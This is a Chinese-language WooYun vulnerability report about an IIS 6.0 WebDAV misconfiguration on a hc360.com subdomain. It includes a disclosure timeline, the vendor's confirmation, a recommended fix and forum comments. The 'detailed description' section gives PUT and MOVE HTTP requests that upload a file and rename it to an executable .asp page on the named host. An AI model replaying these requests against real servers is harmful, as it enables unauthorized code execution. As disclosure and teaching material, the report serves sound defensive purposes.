漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-047069
漏洞标题:慧聪网某分站任意代码执行
相关厂商:慧聪网
漏洞作者: kobin97
提交时间:2013-12-26 12:50
修复时间:2014-02-09 12:50
公开时间:2014-02-09 12:50
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-26: 细节已通知厂商并且等待厂商处理中
2013-12-30: 厂商已经确认,细节仅向厂商公开
2014-01-09: 细节向核心白帽子及相关领域专家公开
2014-01-19: 细节向普通白帽子公开
2014-01-29: 细节向实习白帽子公开
2014-02-09: 细节向公众公开
简要描述:
慧聪网某分站因配置不当,导致任意代码执行。
详细说明:
域名:
http://app.info.hc360.com/
存在IIS 写权限漏洞。可以直接写入可执行文件,从而导致任意代码执行。
PUT /test.txt HTTP/1.1
host: app.info.hc360.com
Content-Length: 4
test
MOVE /test.txt HTTP/1.1
host: app.info.hc360.com
Destinaction:http://app.info.hc360.com/iistest.asp
漏洞证明:
http://app.info.hc360.com/iistest.asp
HTTP/1.1 200 OK
Date: Wed, 25 Dec 2013 16:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private
修复方案:
关闭 WebDav ,设置好权限
版权声明:转载请注明来源 kobin97@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-12-30 09:34
厂商回复:
谢谢
最新状态:
暂无
漏洞评价:
评论
- 2013-12-26 13:35 | HackBraid
( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................) 这个跟ST的命令执行差别大不大?
-
@HackBraid 大牛一般不会报这种刷分洞
- 2013-12-26 15:33 | HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)
@小川 怎么理解不了你这句话。最合理的解释就是你是大牛啊!
-
@HackBraid 我的意思是kobin97怎么可能报ST2
- 2013-12-26 15:47 | HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)
@小川 噢,懂了,那怎么配置不当就可以造成任意执行的?
- 2013-12-26 16:24 | HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)
@扬沙 我是来学习的。。。
-
@HackBraid 预言是discuz 的配置文件泄露
- 2013-12-26 17:02 | HackBraid ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)
@梧桐雨 3ks